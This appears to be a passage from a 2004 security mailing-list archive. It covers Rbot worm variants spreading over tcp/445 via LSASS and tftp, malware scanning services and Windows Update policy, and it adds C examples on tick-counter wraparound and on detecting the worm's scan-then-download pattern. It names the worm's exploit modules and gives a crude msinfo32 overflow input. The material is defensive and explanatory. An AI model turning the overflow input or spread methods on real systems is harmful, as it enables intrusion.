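/* Length of one full counter cycle in days: 2^32 / 86,400,000 ~= 49.71 */
double wrap_period_days(void)
{
    return 4294967296.0 / MS_PER_DAY;
}

/* Correct elapsed time: unsigned subtraction is modulo 2^32, so the result
 * is right across a wrap as long as the real interval is < 2^32 ms. */
DWORD elapsed_ms(DWORD start, DWORD now)
{
    return (DWORD)(now - start);
}

/* Safe timeout check built on elapsed_ms(): no special case for the wrap. */
int deadline_expired_safe(DWORD start, DWORD timeout_ms, DWORD now)
{
    return elapsed_ms(start, now) >= timeout_ms;
}

/* Broken pattern 1: absolute deadline. Once start + timeout_ms wraps to a
 * small number, every `now` before the wrap compares greater than the
 * deadline and the timeout fires immediately. */
int deadline_expired_buggy(DWORD start, DWORD timeout_ms, DWORD now)
{
    DWORD deadline = start + timeout_ms;    /* wraps silently */
    return now > deadline;
}

/* Broken pattern 2: a "clock went backwards" sanity check. After the
 * counter wraps, now < start holds even though time moved forward; an
 * application that treats this as fatal shuts itself down at day 49.7. */
int clock_went_backwards_buggy(DWORD start, DWORD now)
{
    return now < start;
}

/* Days of uptime left before the counter wraps; a reboot resets it to 0. */
double days_until_wrap(DWORD now)
{
    return (double)(0xFFFFFFFFu - now) / MS_PER_DAY;
}

int main(void)
{
    const DWORD start   = 0xFFFFFF00u;      /* 256 ms before the wrap */
    const DWORD timeout = 1000u;            /* one second timeout */
    const DWORD before  = 0xFFFFFFF0u;      /* 240 ms after start, pre-wrap */
    const DWORD after   = 0x00000200u;      /* 768 ms after start, post-wrap */

    printf("counter wraps every %.2f days\n", wrap_period_days());
    printf("elapsed across the wrap: %u ms\n", (unsigned)elapsed_ms(start, after));
    printf("safe:  pre-wrap expired=%d, post-wrap expired=%d\n",
           deadline_expired_safe(start, timeout, before),
           deadline_expired_safe(start, timeout, after));
    printf("buggy: pre-wrap expired=%d (fires after only 240 ms)\n",
           deadline_expired_buggy(start, timeout, before));
    printf("buggy: clock went backwards=%d\n",
           clock_went_backwards_buggy(start, after));
    return 0;
}
```

The scheduled reboot the technicians were told to perform only sets the counter back to zero; elapsed_ms() gives the same right answer on either side of the wrap, so code written that way needs no such procedure. QueryPerformanceCounter, which the thread mentions, and the GetTickCount64() that later Windows releases added both sidestep the wrap by returning 64-bit values.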

Re: [Full-Disclosure] unknown backdoor: 220 StnyFtpd 0wns j0

2004-09-23 Thread joe smith
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_KIBUV.BVSect=T
Ryan Sumida wrote:
I've been finding a few compromised Windows systems on our campus that 
have a random port open with a banner of 220 StnyFtpd 0wns j0.  All 
the systems seem to be doing SYN scans on port 445 and LSASS buffer 
overflow attempts.  Anyone know what worm/bot is doing this?  I don't 
have access to these machines so I can only get a network view of what 
the systems are doing.

Thanks,
Ryan 



Re: [Full-Disclosure] unknown backdoor: 220 StnyFtpd 0wns j0

2004-09-23 Thread joe smith
You can try scanning it if you have the file.  
http://virusscan.jotti.dhs.org

Ryan Sumida wrote:
Thank you all for the help, I definitely appreciate it.  The last 
system I checked had ftp running on port 15708 which makes me believe 
it is not the WORM_KIBUV.B but a similar variant.  Sorry for the 
unnecessary post, I googled the whole string which didn't come back 
with anything.  I should have just googled StnyFtpd.  

Thanks again,
Ryan
[EMAIL PROTECTED] wrote on 09/23/2004 10:42:13 AM:

 I've been finding a few compromised Windows systems on our campus that
 have a random port open with a banner of 220 StnyFtpd 0wns j0.  All
 the systems seem to be doing SYN scans on port 445 and LSASS buffer
 overflow attempts.  Anyone know what worm/bot is doing this?  I don't
 have access to these machines so I can only get a network view of what
 the systems are doing.

 Thanks,

 Ryan 



Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread joe smith
Unless for (a purely theoretical) example the website would use your 
submission to infect others
Right, that is what I'm concerned about.  I do not know the intention of virustotal.com, and their policy on binaries they receive.  The parent site (http://www.hispasec.com/) does not offer more information.  I believe the intention may be good but I have some lingering suspicion that a *free* service that has you send in binaries may be the elaborate work of vx traders.  (cue the conspiracy theories)  

Me submitting the virus to someone counts as distributing the virus (according to the lawyers).  I've been warned by lawyers about such things.  I should add that the lawyers have no problem if I submit the sample to an AV company.  It's more of a CYA than anything else.  

J
Michel Messerschmidt wrote:
On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote:
 

hey if the binary is infected and does not contain any hardcoded 
sensitive info what do u care about the owners of the website ? 
   

Unless for (a purely theoretical) example the website would use your 
submission to infect others (perhaps with your address as sender) :-) 
Although the binary may not contain any sensitive data, it is dangerous 
in itself because it is self-replicating and thus hard to control once 
it is activated. If you are not very cautious when handling 
self-replicating code, you most likely end up sending it out to the 
world.

So for the question how to handle possibly dangerous code 
it all comes down to Who do you trust ?

 



Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe

2004-09-02 Thread Joe Stewart
On Thu, 2 Sep 2004 10:16:30 -0400, S.A. Birl wrote:
Does anyone know how it infects?

Primarily via the LSASS exploit over port 445, but variants have been 
seen with the following additional exploits/password brute-force 
spreading modules:

WebDav
Lsass135
Lsass1025
NetBios
NTPass
Dcom135
Dcom445
Dcom1025
MSSQL
Beagle1
Beagle2
MyDoom
Optix
UPNP
NetDevil
DameWare
Kuang2
Sub7

After the exploit, the bot is copied to the victim using the Windows 
tftp client.

 http://virusscan.jotti.dhs.org/ lists msrtwd.exe as backdoor.sdbot.gen

Yes, some AV companies identify Rbot as SDbot, even though the two look 
almost nothing alike. It could be that Rbot was derived from SDbot, but 
it has grown substantially, and is almost on par with Agobot in terms 
of functionality.

Because there are so many variants, each with a different exe name, it's 
sometimes hard to keep track of them. Just so it can be indexed for 
future reference, here is a list of Rbot exe names we've seen during 
exploit captures, and dates we've seen them spreading over the last 3 
months:

Dates Seen               Exe Name
-----------------------  ----------------
2004/06/06 - 2004/06/27  lsrv.exe
2004/06/06 - 2004/08/28  wuapdate16.exe
2004/06/07 - 2004/06/15  sndcfg16.exe
2004/06/07 - 2004/08/30  wuamgrd.exe
2004/06/08 - 2004/06/27  lsac.exe
2004/06/10 - 2004/06/10  winupdos.exe
2004/06/10 - 2004/06/26  dosprmwin.exe
2004/06/11 - 2004/06/11  systemse.exe
2004/06/11 - 2004/08/18  scrgrd.exe
2004/06/13 - 2004/06/13  dude.exe
2004/06/14 - 2004/06/14  esplorer.exe
2004/06/14 - 2004/06/14  landriver32.exe
2004/06/14 - 2004/06/14  mpd.exe
2004/06/14 - 2004/06/14  updatez.exe
2004/06/14 - 2004/06/25  svssshost.exe
2004/06/14 - 2004/08/26  jacfg2.exe
2004/06/17 - 2004/06/26  wuammgr32.exe
2004/06/18 - 2004/06/18  svhost.exe
2004/06/18 - 2004/06/18  wuamgrd32.exe
2004/06/18 - 2004/06/23  wuamagrd.exe
2004/06/20 - 2004/06/20  wloader.exe
2004/06/21 - 2004/08/29  pidserv.exe
2004/06/22 - 2004/09/01  navscan32.exe
2004/06/23 - 2004/06/23  hpsysmon.exe
2004/06/24 - 2004/06/24  winipcfgs.exe
2004/06/24 - 2004/06/24  wwwstream.exe
2004/06/25 - 2004/06/25  lcsrv64.exe
2004/06/25 - 2004/06/25  srvhost.exe
2004/06/25 - 2004/06/25  systemnt.exe
2004/06/25 - 2004/06/25  win64.exe
2004/06/27 - 2004/06/27  win32apisrvr.exe
2004/08/16 - 2004/08/24  soundblaster.exe
2004/08/16 - 2004/08/25  msnmsg.exe
2004/08/16 - 2004/08/27  windowsup.exe
2004/08/16 - 2004/08/29  muamgrd.exe
2004/08/16 - 2004/08/30  winupdater.exe
2004/08/16 - 2004/08/31  win16update.exe
2004/08/16 - 2004/09/01  dllmngr32.exe
2004/08/17 - 2004/08/17  msdev.exe
2004/08/17 - 2004/08/17  svchostc.exe
2004/08/17 - 2004/08/31  javatm.exe
2004/08/17 - 2004/08/31  usbsvc.exe
2004/08/17 - 2004/09/01  msnmsgr.exe
2004/08/18 - 2004/08/18  mnzks.exe
2004/08/18 - 2004/08/18  notepad.exe
2004/08/18 - 2004/08/18  tcpip.exe
2004/08/19 - 2004/08/19  mss3rvices200x.exe
2004/08/19 - 2004/08/19  msservices200x.exe
2004/08/19 - 2004/09/01  iexplore.exe
2004/08/23 - 2004/08/23  msrtwd.exe
2004/08/24 - 2004/08/24  csass.exe
2004/08/24 - 2004/08/24  winxp32.exe
2004/08/24 - 2004/08/26  nmon.exe
2004/08/24 - 2004/08/27  winupdate.exe
2004/08/24 - 2004/09/01  msnplus.exe
2004/08/25 - 2004/08/25  lsas.exe
2004/08/25 - 2004/08/27  dwervdl32.exe
2004/08/26 - 2004/08/26  jutsu.exe
2004/08/26 - 2004/08/26  usb.exe
2004/08/26 - 2004/08/26  win43.exe
2004/08/27 - 2004/08/27  java.exe
2004/08/27 - 2004/08/27  svchost32.exe
2004/08/27 - 2004/08/29  iexplorer.exe
2004/08/27 - 2004/08/30  ati2vid.exe
2004/08/27 - 2004/08/30  svchosts.exe
2004/08/29 - 2004/08/29  server.exe
2004/08/29 - 2004/08/30  nortoanavap.exe
2004/08/29 - 2004/09/02  syswin32.exe
2004/08/30 - 2004/09/02  rsvc32.exe
2004/08/30 - 2004/09/02  vsmons.exe
2004/08/31 - 2004/08/31  winsrv.exe
2004/09/02 - 2004/09/02  sslwina.exe
2004/09/02 - 2004/09/02  winxpini.exe

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/


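The spread pattern Ryan Sumida observed and Joe Stewart describes (SYN scans of tcp/445 for the LSASS hole, then the bot copied to the victim with the Windows tftp client), as an added detection example that is not code from either post: it walks a list of flow records, flags a source that fans SYN-only probes out to tcp/445 across many hosts, and then lists every probed host that afterwards pulled a file over udp/69 from that scanner. The flow records and their field layout are constructed for the example, not any collector's real format, and the scan threshold is an assumption to tune to the network.

```c
/*
 * Added example, not code from the thread: flag the spread pattern described
 * above (SYN sweep of tcp/445 for the LSASS hole, then the victim fetching the
 * bot from the attacker with the Windows tftp client, udp/69) in flow records.
 * The records and their field layout are constructed for this example, not a
 * real collector's format, and SCAN_THRESHOLD is an assumption to tune.
 */
#include <stdio.h>
#include <string.h>

struct flow {
    int         t;         /* seconds since start of capture */
    const char *src;
    const char *dst;
    int         proto;     /* 6 = tcp, 17 = udp */
    int         dport;
    int         syn_only;  /* 1 = SYN sent, handshake never completed */
};

/* Constructed sample: 10.1.1.50 sweeps 10.1.2.0/24 on 445, gets a full
 * handshake from 10.1.2.7, which then pulls a file over tftp from it.
 * 10.1.1.60 is an ordinary SMB client; 10.1.3.1 does an unrelated tftp. */
static const struct flow SAMPLE[] = {
    {  1, "10.1.1.50", "10.1.2.1",  6, 445, 1 },
    {  1, "10.1.1.50", "10.1.2.2",  6, 445, 1 },
    {  1, "10.1.1.50", "10.1.2.3",  6, 445, 1 },
    {  2, "10.1.1.50", "10.1.2.4",  6, 445, 1 },
    {  2, "10.1.1.50", "10.1.2.5",  6, 445, 1 },
    {  2, "10.1.1.50", "10.1.2.6",  6, 445, 1 },
    {  3, "10.1.1.50", "10.1.2.7",  6, 445, 0 },  /* exploit delivered */
    {  5, "10.1.1.60", "10.1.3.1",  6, 445, 0 },  /* normal file share use */
    {  9, "10.1.1.60", "10.1.3.1",  6, 445, 0 },
    { 40, "10.1.2.7",  "10.1.1.50", 17,  69, 0 },  /* bot download via tftp */
    { 41, "10.1.2.7",  "10.1.1.50", 17,  69, 0 },
    { 50, "10.1.3.1",  "10.1.9.9",  17,  69, 0 },  /* tftp with no prior scan */
};
#define SAMPLE_N       ((int)(sizeof SAMPLE / sizeof SAMPLE[0]))
#define SCAN_THRESHOLD 5     /* distinct 445 targets that count as a sweep */
#define MAX_HOSTS      64

static int in_list(const char **list, int n, const char *h)
{
    for (int i = 0; i < n; i++)
        if (strcmp(list[i], h) == 0)
            return 1;
    return 0;
}

/* Distinct hosts that `src` sent SYN-only probes to on tcp/445. */
int distinct_445_targets(const struct flow *f, int n, const char *src)
{
    const char *seen[MAX_HOSTS];
    int nseen = 0;
    for (int i = 0; i < n; i++) {
        if (strcmp(f[i].src, src) != 0 || f[i].proto != 6 ||
            f[i].dport != 445 || !f[i].syn_only)
            continue;
        if (nseen < MAX_HOSTS && !in_list(seen, nseen, f[i].dst))
            seen[nseen++] = f[i].dst;
    }
    return nseen;
}

int is_445_scanner(const struct flow *f, int n, const char *host)
{
    return distinct_445_targets(f, n, host) >= SCAN_THRESHOLD;
}

/* Hosts probed on 445 by `scanner` that later fetched something from it over
 * udp/69: a successful exploit followed by the bot download. Returns the
 * count and writes the host addresses to `out`. */
int find_victims(const struct flow *f, int n, const char *scanner,
                 const char **out, int max_out)
{
    int found = 0;
    for (int i = 0; i < n && found < max_out; i++) {
        if (f[i].proto != 17 || f[i].dport != 69 || strcmp(f[i].dst, scanner) != 0)
            continue;
        int probed = 0;  /* did the scanner hit this host on 445 earlier? */
        for (int j = 0; j < n; j++)
            if (f[j].t < f[i].t && f[j].proto == 6 && f[j].dport == 445 &&
                strcmp(f[j].src, scanner) == 0 && strcmp(f[j].dst, f[i].src) == 0)
                probed = 1;
        if (probed && !in_list(out, found, f[i].src))
            out[found++] = f[i].src;
    }
    return found;
}

int main(void)
{
    const char *victims[MAX_HOSTS];
    int nv = find_victims(SAMPLE, SAMPLE_N, "10.1.1.50", victims, MAX_HOSTS);
    printf("10.1.1.50 scanner=%d, tftp pulls back from probed hosts=%d\n",
           is_445_scanner(SAMPLE, SAMPLE_N, "10.1.1.50"), nv);
    for (int v = 0; v < nv; v++)
        printf("  likely infected: %s\n", victims[v]);
    return 0;
}
```

Matching on the network behaviour is more dependable than matching on the executable names in the list above, several of which (notepad.exe, iexplore.exe, java.exe) are chosen precisely to look legitimate; the tftp pull back to the scanner is what tells a probed host apart from one that was merely scanned.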

Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-02 Thread joe smith
Does anyone have more information about http://www.hispasec.com/, who 
runs virustotal?  I don't feel comfortable sending a binary to some 
company that I have no information about.

J
bashis wrote:
Thx for the tip with VirusTotal guys! =)
Here is the result.
/bashis
Forwarded message:
 

From [EMAIL PROTECTED]  Thu Sep  2 18:38:33 2004
Date: Thu, 2 Sep 2004 18:38:32 +0200
   

[snip]
 

Virus Total
___
Scan results
File: win2kup2date.exe
Date: 09/02/2004 20:31:53

BitDefender 7.0/20040902found nothing
ClamWin devel-20040822/20040901 found nothing
eTrustAV-Inoc   4641/20040728   found nothing
Kaspersky   4.0.2.24/20040902   found [Backdoor.Rbot.gen]
McAfee  4389/20040901   found [W32/Sdbot.worm.gen.h]
NOD32v2 1.858/20040901  found nothing
Norman  5.70.10/20040902found nothing
Panda   7.02.00/20040902found [W32/Gaobot.AKP.worm]
Sybari  7.5.1314/20040902   found [Worm.RBot.HY]
Symantec8.0/20040901found nothing
TrendMicro  7.000/20040901  found nothing
___
VirusTotal is a free service offered by Hispasec Sistemas.
There are no guarantees about availability and continuity of
this service. Do not reply to this message, it has been sent by
an automated process that will not handle such responses. Even
when the detection rate given by the use of multiple antivirus
engines is far superior to the one offered by only one product,
these results DO NOT guarantee the harmlessness of a file. There
is no such solution that can offer a 100% rate of effectiveness
recognizing viruses and malware.
___
Servidor Antivirus HispaSec Sistemas
(c) Hispasec Sistemas, 1998-2004
http://www.hispasec.com
   

 



Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe

2004-09-01 Thread Joe Stewart
On Wed, 1 Sep 2004 15:08:56, Scott Birl wrote:
 Recently discovered a trojan(? - possibly a virus) called msrtwd.exe.
 It's listed in the Registry as Microsoft Update Loader

 Does anyone know anything about this?   Google doesn't offer much.

We saw an Rbot variant spreading on August 23 with the same exe name. 
I've also seen other Rbot variants using a similar registry key name. 
Kaspersky does a pretty good job of spotting unknown Rbot variants with 
a generic signature Backdoor.Rbot.gen.

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/



Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe

2004-09-01 Thread joe smith
You can run it through http://www.virustotal.com and see if it catches anything.
J
S.A. Birl wrote:
Hello all:
Recently discovered a trojan(? - possibly a virus) called msrtwd.exe.
It's listed in the Registry as Microsoft Update Loader
Does anyone know anything about this?   Google doesn't offer much.
Thanks
Scott Birl  http://concept.temple.edu/sysadmin/
Senior Systems AdministratorComputer Services   Temple University
*******+********
 



RE: [Full-Disclosure] MSInfo Buffer Overflow

2004-08-30 Thread joe
I think at best you could succeed in crashing the process or executing code
in the context of the user running msinfo32. 
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of E.Kellinis
Sent: Monday, August 30, 2004 11:17 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MSInfo Buffer Overflow

SNIP

Although in tests this bug wouldn't lead to dangerous situations.. 
I wouldn't bet 100% on that !

=
Proof Of Concept Code
=

C:\Program Files\Common Files\Microsoft Shared\MSInfo
msinfo32 /msinfo_file=
AA
AA
AA
AA
AAA



RE: [Full-Disclosure] Windows Update

2004-08-25 Thread joe
Yes the update that caused the issue was a dat file update, not an engine
update. I agree, I think our AV product line sucked. Actually many of us
consistently said it was worse than the viruses it was trying to protect us
from. I will let you guess the product, but it is a common one for large
companies and starts with a Mc. 

You are correct in that it is the default, however I think as a whole that
is the safer choice for the default. People who understand the system or
even understand they have to do updates, will know or be able to figure out
how to disable the automatic install and if they want the automatic
download. If MS didn't set that default then the next time a worm or virus
slid through that would have been stopped or slowed by a majority of the
non-techie users having had their machines at autoupdate they would have
taken a beating from this community for not having done so. 

I think you have to look at your user population in order to decide how you
should implement different things. There may be an ideal world answer but if
it doesn't address reality it isn't so good. Windows has an extremely large
number of non-technical users and admins running around, more than any other
OS. MS has to take that into account when doing things. If they didn't set
that updates need to be auto-downloaded/installed how many (by percentage)
Windows users/admins do you think would know to actually turn it on? How
many knew to turn off IIS in the earlier Windows incarnations? I would be
surprised to hear a number greater than 15-20% but I am taking a wild guess.
The folks that don't want auto-updates are probably of the more technical
realm so they shouldn't have tremendous issues disabling the updates. 




  joe

-Original Message-
From: Über GuidoZ [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, August 24, 2004 6:13 PM
To: joe
Cc: FD
Subject: Re: [Full-Disclosure] Windows Update

A very valid point Joe, thanks for bringing it up. I DID say I only allow
virus definition files to auto-update, not program updates. Are the
definition file updates the ones causing the problems you speak of, or the
program updates to the scanning engine?

Besides that, If you can't trust the definitions updates to go properly,
then you seriously need to think about changing AV products.
;)

Reading further down the conversation, I see discussion on the Auto-Update
service. Some good points were mentioned here too. Just because it is
enabled it doesn't mean you have to let them INSTALL. In fact, you can do an
advanced install method to pick and choose which patches to install from the
downloaded updates. A nice feature indeed
- I hope this hasn't been altered in post SP2. (I never checked.) My point
was to argue against the automated downloading and installing of updates,
which I believe IS the default after SP2 is installed.

~G

On Sun, 22 Aug 2004 09:01:54 -0400, joe [EMAIL PROTECTED] wrote:
 If that is your stance, you should probably have it for AV updates as
well.
 There have been various AV updates that have been known to break 
 functionality and blue screen boxes. I recall one update for one of my 
 customers that had blown up a good many web servers and local site 
 file and print servers (hundreds of servers) and this is with an AV 
 Update that was approved by and placed on the distribution server by
central security.
 
 Anyway, versus completely shutting down WU, you can configure to 
 automatic download without installation.
 
 All that being said, actively professionally maintained servers are in 
 a different boat than most machines that will be running WU. In a 
 large properly firewalled and protected corporate environment, I don't 
 think the client support group would really depend on automatic 
 updates from outside the company, they would use SUS or some other 
 deployment mechanism. If using some other deployment mechanism, WU 
 would be off. Either way, patches would be tested before being deployed,
it wouldn't be automatic.
 
 That being said, once you get to x machines with x being a function of 
 your resources available to do testing, the number of LOB apps you 
 have running, and how bad the hole is being plugged you will run into 
 occasion where you can not test everything and simply have to release. 
 One would hope that this will be less frequent if you have XP SP2 
 deployed and have the firewall up and running without turning it into 
 swiss cheese but until we see the next worm type attack and see if XP SP2
is safer we can't for sure say anything.
 If the biggest issues end up requiring some sort of people 
 interaction, then that is quite a win in and of itself.
 
   joe
 
 
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Über 
 GuidoZ
 Sent: Saturday, August 21, 2004 7:56 PM
 To: FD
 Subject: Re: [Full-Disclosure] Windows Update
 
 Umm, hold on a sec here...
 
 (snip from James Tucker):
  There really should be no reason why you would want

RE: [Full-Disclosure] Windows Update

2004-08-24 Thread joe
The client is required. I have sent a complaint to MS though concerning the
idea that the service set to manual but started doesn't allow the updates to
occur. That, I agree, is a bad design choice. 

If the service is set to automatic but not started, it will get started as
soon as you try to actually search for updates. Having it set to auto and
not started just gets you past the initial check. I actually replaced the
service with a quick do-nothing service I wrote and the web page gets past
the initial check but then hangs in the search for updates section. I have
no doubt that the client is actually used and needed. 

Once again, I agree requiring the service set to automatic is poor. Again
however, this isn't life threatening or insecure, just a pain. Simply use
something to quickly change the start config for the service before going to
the windows update site and change it back afterward. No big hoo hoo. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Monday, August 23, 2004 4:35 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windows Update


It's a little bit more than seriously annoying, though.  It represents a
very poor design choice.

Obviously, if this setting change works, it means that the automatic update
client is not actually necessary to install patches from windowsupdate.  I
could see the service requirement *if* Microsoft were piggybacking the
installation code off of the client in an effort to no longer rely on
installing the code with an ActiveX control, however what this demonstrates
is that the only reason to do this check is strictly to ensure that
automatic updates is running.

This is either a bug or a very poor design choice. 

If the idea is to ensure that everyone has automatic update running, then
it's going fail.  The people who are getting their updates from
WindowsUpdate are not the people you generally need to worry about getting
their patches -- it's the people who don't know about WindowsUpdate and who
don't have automatic update running that you have to worry about.

What I'm saying is that warning people is good; blocking people is bad.

It's kind of like not letting someone get a medical checkup if they don't
check their blood sugar everyday.  It hurts people more than it helps.

 -Barry





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] Windows Update

2004-08-23 Thread joe
 What I see Microsoft as doing is pretty much forcing 
 everyone to turn on Automatic Windows Update.  Why 
 leave it as a control panel option, I've no clue.  
 Same with BIT (Background Intelligent Transfers.) 
 For the millions of users out there that are likely 
 subject to viruses, etc, I'm sure it will help make 
 things better, but for people who would fit into the 
 power user class, it's a real pain in the arse.
SNIP
 I really object to this philosophy because it does 
 not let a person plan the downloading and installation 
 of updates - some of which will require a reboot.

No they aren't. If you don't want auto updates, you set it to no
autoupdates, like my machine is now. Then it won't do anything unless you go
out and tell it to. Of course the service is still running but if you are a
power user, you know how to disable the service and reenable when you want
to go get the updates. As I mentioned previously, this is kind of a pain,
but certainly isn't forcing you to have AU on and has no impact on your
planning of downloading and installing of updates. A power user knows it
only takes a single command line to stop and disable the WU service and
single command line to reenable and start it again. 


 What do large corporate installations of Windows do here?

Depends on the company. The large ones I have worked/talked with, 5k+ seats
to about 200k seats, use various methodologies for deploying software and
patches, from custom in house services to simple batch files to SMS to
Windows Update service either due to using SUS or using the Update Web Site.


 Do they run their own caches of the Windows updates?

In many cases yes. Depends on the deployment method. 

 Push out updates from servers rather than have clients pull?

In some cases yes. 

 Is it all done with SUS?

Nope, but many do.

 Is SUS usable on a single node, in place of WU?

SUS depends on the WU client.

 The help for the Windows Update web site suggests 
 that it is possible to get updates without Automatic Updates.  
 Is the help out of date or is there a way to still do it 
 without AU on ?

You go to the KB articles or security bulletins and download the qfe's
manually. In my last job as a Server Admin, there wasn't a single update in
3 years I pulled through Windows Update Web site. In fact the company
blocked that traffic at the firewall. I or our systems integration group
would check out the new issues and download the patch or get it from
Microsoft Support and then integrate it into our patching methodologies
(basically batch it up for silent install) and test it to make sure the
install wasn't damaging then test it for functionality then deploy it. The
client group would slap the patch package into the software deployment
system and it would zoom out to the local site servers where the local
admins would schedule the deployment to their local workstations.  

There is no hard fast answer to patch management. Many at the corporate
levels beat MS for that but then many others don't care as they already have
something be it shavlik, SMS, SUS, or something they have whipped up for
themselves from fancy batch files to interactive perl scripts to automatic
service/daemon like service scripts, to actual custom executables.
Personally I like the freedom of choice in how things can be deployed, I
certainly wouldn't want to be railroaded into a single methodology like you
misunderstand WU to be. 


  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed
Sent: Monday, August 23, 2004 6:52 AM
To: Security List
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windows Update

In some mail from Security List, sie said:
 
 Went to windows update last night w/ XP Pro. 
 Redirected to the v5 version.  I was asked to install the new Windows 
 Update software...downloaded the WU software...copied the files...then 
 saw registering...kinda thinking that it was checking for a valid 
 registration or license.  No updates needed according to WU.  XP SP2 
 is not available via WU for XP Pro yet.
 
 Now, I checked the Automatic Update service to see if it was turned 
 back start automatic as I always have it disabled.  Yup, it was set to 
 automatic and it was started.  I stop and disable automatic update 
 service, and try WU.  Get error stating that the automatic update 
 service must be enabled to use WU now.  Has anybody else heard of this?  
 Once again, we must have services that we do not want enabled.  I can 
 not believe that they are forcing users to turn on the service to use 
 WU.

I discovered this when testing out v5beta and had to do a checkpoint
recovery to restore version 4.  If you don't install the latest Windows
Update software (if, for example, you have all Active X stuff set for
prompting and you say no) then you don't even get to 1st base and Windows
Updates (via a convenient mechanism) are not available.
IMHO, this sucks big time.

What I see Microsoft as doing

RE: [Full-Disclosure] The 'good worm' from HP

2004-08-22 Thread joe
 Allan is right. I didn't notice people calling it a worm. 


From the article at InfoWorld...

SNIP
"We've been working with (customers) for the last month now," said Tony
Redmond, vice president and chief technology officer with HP Services in an
interview.
SNIP
"This is a good worm," said Redmond. "It's turning the techniques (of the
attackers) back on them."
SNIP

Possibly he used a bad choice of words. 



I definitely agree though that you probably shouldn't be infecting
machines to patch them. In order to patch through a hole like that you are
running code through that hole and that is the same as infecting in my book,
you just aren't propagating. You could still make the machine unstable or
cause other issues. I think my preference would be something along the lines
of what the NetSquid project is doing mentioned previously but be more
aggressive. Sure have the feed from SNORT to actively go out and pop the
machines currently sending bad traffic, but also scan for machines that
*could* get infected and shut them down as well. That would be a good use of
this tech HP is working on, simply identify the machines. However others
have done the similar in terms of detection so that wouldn't be nearly as
new and daring. They could do a good thing by making it fully supported by a
big name, stable, quick, and part of an overall framework for protecting the
network environment. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: Saturday, August 21, 2004 8:58 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] The 'good worm' from HP

SNIP



RE: [Full-Disclosure] Windows Update

2004-08-22 Thread joe
If that is your stance, you should probably have it for AV updates as well.
There have been various AV updates that have been known to break
functionality and blue screen boxes. I recall one update for one of my
customers that had blown up a good many web servers and local site file and
print servers (hundreds of servers) and this is with an AV Update that was
approved by and placed on the distribution server by central security. 

Anyway, versus completely shutting down WU, you can configure to automatic
download without installation. 

All that being said, actively professionally maintained servers are in a
different boat than most machines that will be running WU. In a large
properly firewalled and protected corporate environment, I don't think the
client support group would really depend on automatic updates from outside
the company, they would use SUS or some other deployment mechanism. If using
some other deployment mechanism, WU would be off. Either way, patches would
be tested before being deployed, it wouldn't be automatic. 

That being said, once you get to x machines with x being a function of your
resources available to do testing, the number of LOB apps you have running,
and how bad the hole is being plugged you will run into occasion where you
can not test everything and simply have to release. One would hope that this
will be less frequent if you have XP SP2 deployed and have the firewall up
and running without turning it into swiss cheese but until we see the next
worm type attack and see if XP SP2 is safer we can't for sure say anything.
If the biggest issues end up requiring some sort of people interaction, then
that is quite a win in and of itself. 

  joe
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Über GuidoZ
Sent: Saturday, August 21, 2004 7:56 PM
To: FD
Subject: Re: [Full-Disclosure] Windows Update

Umm, hold on a sec here... 

(snip from James Tucker):
 There really should be no reason why you would want to disable the  
Automatic Updates service anyway, unless you are rolling out updates  
using a centralised distribution system, in which case you would not 
need it anyway.

I believe you are missing one fundamental point: SPs and updates are
notorious for breaking something else. (Especially from Microsoft.) Granted,
if fixing a security weakness breaks something you're using, then that
aspect could have been written better. However, that still doesn't fix it
when an entire business network goes down and YOU are the one responsible. I
do not allow ANY automatic updates (except for virus definitions) to run on
ANY networks I am in charge of. I take the time (like every good sysadmin
should) to look over each update before applying it so I know three things:

1. What it's fixing/patching
2. Why it's fixing/patching it
3. What will be the end result of the fix/patch

If you would simply allow updates and SPs to have free rein over your
system(s) without taking any time to look over those updates, you're going
to be one busy and irritated sysadmin. That is, if you still have a job
after a little bit.

~G

P.S. Don't take my word for it. Look here:
 - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html
 - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1
 - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619
 - http://www.vnunet.com/news/1157279
 - Or, find the other 200+ articles by searching Google News
for disable automatic update sp2  =)

On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker [EMAIL PROTECTED] wrote:
 Here I found that I can have BITS and Automatic Updates in manual, 
 Windows Update works fine here. It may be a good idea to refresh the 
 MMC console page, as you will probably find that at time the service 
 had shut down if and when BITS was stopped prematurely (i.e. when it 
 was in use).
 
 There really should be no reason why you would want to disable the 
 Automatic Updates service anyway, unless you are rolling out updates 
 using a centralised distribution system, in which case you would not 
 need it anyway.
 
 If you are worried about system resources, you should look into how 
 much the service really uses; the effect is negligable, in fact there 
 is more impact if you select (scroll over) a large number of 
 application shortcuts (due to the caching system) than if you leave 
 Automatic Updates on. If you are worried about your privacy and you 
 don't believe that the data sent back and forth has not been checked 
